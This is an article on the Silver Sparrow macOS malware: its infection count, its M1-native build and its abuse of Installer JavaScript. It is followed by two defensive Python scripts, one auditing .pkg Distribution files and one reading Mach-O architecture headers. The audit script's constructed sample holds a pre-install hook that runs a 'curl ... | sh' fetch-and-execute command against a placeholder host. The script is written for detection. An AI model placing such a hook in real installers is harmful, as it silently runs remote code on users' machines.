Only days after the first malware compiled to run natively on Apple's M1 chip was reported, a second strain has surfaced, and this one has reportedly infected about 30,000 Macs, Intel models included.

The malware, named "Silver Sparrow" by security firm Red Canary, had been found on 29,139 macOS systems in 153 countries at the time of the report, with the largest concentrations in the United States, the United Kingdom, Canada, France and Germany.

That figure covers Intel Macs as well; Red Canary has not disclosed how many of the infected machines are M1 Macs.

The malware abuses the JavaScript API of the macOS Installer to run commands while its .pkg is being installed, an unusual technique for macOS malware. Even after more than a week of observation by Red Canary and its research partners, however, the final payload (the code that would actually carry out the malicious activity) has not been seen, so the real threat remains a mystery.
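The Installer hook being abused here is the JavaScript that a distribution-style .pkg carries in its `Distribution` XML file: attributes such as `installation-check script="..."` hand control to JavaScript before anything is installed, and the `system.run` / `system.runOnce` API lets that script spawn a program. The triage script below is an added example, not part of the article or of Red Canary's analysis, and the embedded `Distribution` file is constructed for illustration (the `curl | sh` one-liner is invented and is not Silver Sparrow's actual script). It parses the XML, lists the hooks that evaluate JavaScript, and extracts every process-spawning call so an analyst can see what a package would execute without running it.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of an Installer "Distribution" file (the XML that product
# archives built with productbuild carry at their root). The JavaScript is
# invented for this example; it only reproduces the shape of the technique.
SAMPLE_DISTRIBUTION = """<installer-gui-script minSpecVersion="1">
    <title>Updater</title>
    <options customize="never"/>
    <installation-check script="installationCheck()"/>
    <script>
    <![CDATA[
    function installationCheck() {
        // constructed: spawns a shell during the pre-install check
        system.run("/bin/bash", "-c", "curl -s https://example.invalid/x | sh");
        return true;
    }
    ]]>
    </script>
    <choices-outline>
        <line choice="default"/>
    </choices-outline>
    <choice id="default" title="Updater"/>
    <pkg-ref id="com.example.updater" version="1.0">#updater.pkg</pkg-ref>
</installer-gui-script>
"""

# (element, attribute) pairs whose value the Installer evaluates as JavaScript.
JS_ATTRIBUTES = {
    ("installation-check", "script"),
    ("volume-check", "script"),
    ("choice", "visible"),
    ("choice", "selected"),
    ("choice", "enabled"),
    ("choice", "start_visible"),
    ("choice", "start_selected"),
    ("choice", "start_enabled"),
}

# system.run / system.runOnce are the Installer JavaScript calls that execute a program.
RUN_CALL = re.compile(r"system\.run(?:Once)?\s*\(([^)]*)\)")


def audit_distribution(xml_text):
    """Return the JS hooks and the process-spawning calls found in a Distribution file."""
    root = ET.fromstring(xml_text)
    findings = {"hooks": [], "run_calls": []}
    # Which XML attributes hand control to JavaScript during the install flow.
    for elem in root.iter():
        for tag, attr in JS_ATTRIBUTES:
            if elem.tag == tag and attr in elem.attrib:
                findings["hooks"].append(f'<{tag} {attr}="{elem.attrib[attr]}">')
    # Every <script> body that spawns a process; arguments are split and unquoted.
    for script in root.iter("script"):
        for match in RUN_CALL.finditer(script.text or ""):
            args = [a.strip().strip("\"'") for a in match.group(1).split(",")]
            findings["run_calls"].append(args)
    return findings


def is_suspicious(findings):
    """Flag a package that both hooks JavaScript into the install flow and spawns processes."""
    return bool(findings["hooks"]) and bool(findings["run_calls"])


if __name__ == "__main__":
    result = audit_distribution(SAMPLE_DISTRIBUTION)
    for hook in result["hooks"]:
        print("JS hook:", hook)
    for args in result["run_calls"]:
        print("spawns:", " ".join(args))
    print("suspicious:", is_suspicious(result))
```

On a Mac the `Distribution` file of a real package can be extracted without installing it with `pkgutil --expand suspect.pkg outdir`, and the resulting `outdir/Distribution` fed to `audit_distribution`. A legitimate package may carry JavaScript too (version or disk-space checks are common), so the signal worth alerting on is the combination: a pre-install hook plus a `system.run` call that launches a shell or interpreter.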

At the time of the report, Silver Sparrow does nothing visible beyond displaying a window: the Intel-only build shows the message "Hello, world!", while the build that runs natively on the M1 shows a red window reading "You did it!".

[Image: SilverSparrow]

Nevertheless, Red Canary rates it a "reasonably serious threat" because of the confirmed spread described above: the malware's M1 compatibility, global reach, relatively high infection rate and operational maturity leave it uniquely positioned to deliver a potentially impactful payload at a moment's notice.

When the first M1-native malware was reported, researchers pointed out that recompiling existing malware for the M1 is easy, while most antivirus engines that flagged the Intel build failed to detect the arm64 build. As M1 Mac sales accelerate and the installed base grows, Apple and security vendors will need to respond just as quickly.
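Whether a sample "runs natively on the M1" comes down to its Mach-O header: an Intel-only build is a thin 64-bit Mach-O with cputype x86_64, while a universal build starts with a fat header whose entries list one slice per architecture, arm64 among them. The code below is an added example, not from the article or from Red Canary, and the binaries it inspects are constructed headers, not real executables; it reads only the header fields, so it shows exactly which bytes distinguish the two Silver Sparrow variants and runs on any platform.

```python
import struct

# Mach-O magic values and CPU types from <mach-o/fat.h> and <mach/machine.h>.
FAT_MAGIC = 0xCAFEBABE      # universal binary; fat header fields are big-endian
FAT_MAGIC_64 = 0xCAFEBABF   # variant with 64-bit offsets (fat_arch_64 entries)
MH_MAGIC_64 = 0xFEEDFACF    # thin 64-bit Mach-O; fields little-endian on x86_64/arm64
CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_X86_64 = 7 | CPU_ARCH_ABI64    # 0x01000007
CPU_TYPE_ARM64 = 12 | CPU_ARCH_ABI64    # 0x0100000C
CPU_NAMES = {CPU_TYPE_X86_64: "x86_64", CPU_TYPE_ARM64: "arm64", 7: "i386", 12: "arm"}


def architectures(data):
    """Return the architectures a Mach-O file carries, reading only its header(s)."""
    if len(data) < 8:
        raise ValueError("too short for a Mach-O header")
    magic_be = struct.unpack(">I", data[:4])[0]
    if magic_be in (FAT_MAGIC, FAT_MAGIC_64):
        nfat = struct.unpack(">I", data[4:8])[0]
        # fat_arch: cputype, cpusubtype, offset, size, align (fat_arch_64 adds
        # 64-bit offset/size and a reserved field).
        entry_size, fmt = (20, ">IIIII") if magic_be == FAT_MAGIC else (32, ">IIQQII")
        arches = []
        for i in range(nfat):
            off = 8 + i * entry_size
            cputype, _sub, slice_off = struct.unpack(fmt, data[off:off + entry_size])[:3]
            # Cross-check the entry against the slice it points at; a mismatch
            # means the fat table does not describe the code that would run.
            slice_cpu = struct.unpack("<I", data[slice_off + 4:slice_off + 8])[0]
            if slice_cpu != cputype:
                raise ValueError(f"fat entry {i} claims {cputype:#x} but slice is {slice_cpu:#x}")
            arches.append(CPU_NAMES.get(cputype, hex(cputype)))
        return arches
    magic_le = struct.unpack("<I", data[:4])[0]
    if magic_le == MH_MAGIC_64:
        cputype = struct.unpack("<I", data[4:8])[0]
        return [CPU_NAMES.get(cputype, hex(cputype))]
    raise ValueError("not a Mach-O header")


def runs_natively_on_m1(data):
    """True when the file has an arm64 slice, i.e. it needs no Rosetta translation."""
    return "arm64" in architectures(data)


def thin_header(cputype):
    """Constructed 32-byte mach_header_64 (MH_EXECUTE, no load commands); test data only."""
    return struct.pack("<8I", MH_MAGIC_64, cputype, 0, 2, 0, 0, 0, 0)


def build_universal(thin_slices):
    """Assemble a minimal fat binary from thin headers, page-aligned the way lipo lays them out."""
    page = 4096
    header = struct.pack(">II", FAT_MAGIC, len(thin_slices))
    entries, body = b"", b""
    for i, blob in enumerate(thin_slices):
        cputype = struct.unpack("<I", blob[4:8])[0]
        offset = page * (i + 1)
        entries += struct.pack(">IIIII", cputype, 0, offset, len(blob), 12)  # align = 2**12
        body += blob.ljust(page, b"\0")
    return (header + entries).ljust(page, b"\0") + body


# Constructed stand-ins for the two variants described above.
INTEL_ONLY = thin_header(CPU_TYPE_X86_64)
UNIVERSAL = build_universal([thin_header(CPU_TYPE_X86_64), thin_header(CPU_TYPE_ARM64)])

if __name__ == "__main__":
    for name, blob in (("intel-only", INTEL_ONLY), ("universal", UNIVERSAL)):
        print(name, architectures(blob), "native on M1:", runs_natively_on_m1(blob))
```

On a Mac, `file` and `lipo -archs` report the same information; the point of reimplementing it is that the check can run in a detection pipeline on any OS and that it makes the gap explicit: a signature written against the x86_64 slice says nothing about the arm64 slice sitting a few pages further into the same file.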
